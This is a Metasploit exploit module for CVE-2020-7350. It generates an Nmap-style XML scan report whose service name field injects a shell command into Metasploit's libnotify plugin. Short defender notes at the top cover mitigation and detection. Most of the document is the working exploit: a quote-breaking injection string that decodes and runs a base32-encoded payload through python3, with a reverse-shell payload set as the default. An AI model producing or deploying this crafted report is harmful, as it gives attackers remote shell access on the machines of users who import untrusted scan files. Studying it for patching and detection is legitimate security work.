## https://sploitus.com/exploit?id=MSF:EXPLOIT/UNIX/FILEFORMAT/METASPLOIT_LIBNOTIFY_CMD_INJECTION
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module for CVE-2020-7350. It writes an Nmap-style XML report in
# which the service name of one port carries a shell command. Per the module
# description, the flaw is a shell command injection in Metasploit's libnotify
# plugin and affects Metasploit 5.0.79 and earlier, so the affected party is a
# Metasploit user who processes the generated report.
#
# Defender notes:
# - Mitigation: run a Metasploit release later than 5.0.79 (the description
#   lists 5.0.79 and earlier as affected) and treat scan reports received from
#   third parties as untrusted input.
# - Root cause class: a parsed report field reaches a shell command line. Code
#   that shells out with such fields should pass an argument vector instead of
#   building a command string.
# - Detection: service names in scan reports are expected to be short
#   identifiers such as "ssh"; quotes, semicolons or ampersands in that
#   attribute are a useful review signal before import.
class MetasploitModule < Msf::Exploit::Remote
  # Reliability ranking declared by the module author.
  Rank = ExcellentRanking

  # Supplies file_create, which #exploit uses to write the report to disk.
  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata and the FILENAME option.
  #
  # @param info [Hash] metadata overrides, merged with the values below
  #   through update_info
  def initialize(info = {})
    super(update_info(info,
                      'Name'           => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
                      'Description'    => %q(
        This module exploits a shell command injection vulnerability in the
        libnotify plugin. This vulnerability affects Metasploit versions
        5.0.79 and earlier.
      ),
                      'DisclosureDate' => 'Mar 04 2020',
                      'License'        => GPL_LICENSE,
                      'Author'         =>
                        [
                          'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
                        ],
                      # Advisory identifier and the upstream issue tracking the report.
                      'References'     =>
                        [
                          [ 'CVE', '2020-7350' ],
                          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
                        ],
                      # The payload is a Unix shell command string (ARCH_CMD), not native code.
                      'Platform'       => 'unix',
                      'Arch'           => ARCH_CMD,
                      'Payload'        =>
                        {
                          'DisableNops' => true
                        },
                      'DefaultOptions' =>
                        {
                          'PAYLOAD' => 'cmd/unix/reverse_python'
                        },
                      'Targets' => [[ 'Automatic', {}]],
                      # Declared as not requiring privileged access.
                      'Privileged' => false,
                      'DefaultTarget' => 0))

    # FILENAME is optional (required flag is false) and defaults to scan.xml.
    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  # Builds the XML report and writes it to the file named by FILENAME.
  #
  # The document describes a single host with one open TCP port (22). All of
  # it is static text except the interpolated, base32-encoded payload inside
  # the <service name="..."> attribute. That attribute value opens with
  # `ssh'` and closes with `printf '`.
  # NOTE(review): the shape of that value suggests the vulnerable plugin code
  # places the service name inside a single-quoted shell argument; the plugin
  # source is not shown here, so confirm against the referenced issue.
  # NOTE(review): base32 plus `.upper()` presumably keeps the encoded command
  # free of characters that need XML or shell escaping - confirm.
  #
  # This method itself only writes a file; it opens no connection.
  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)

    # Report the configured output name, then write the document via file_create.
    print_status "Writing xml file: #{datastore['FILENAME']}"
    file_create xml
  end
end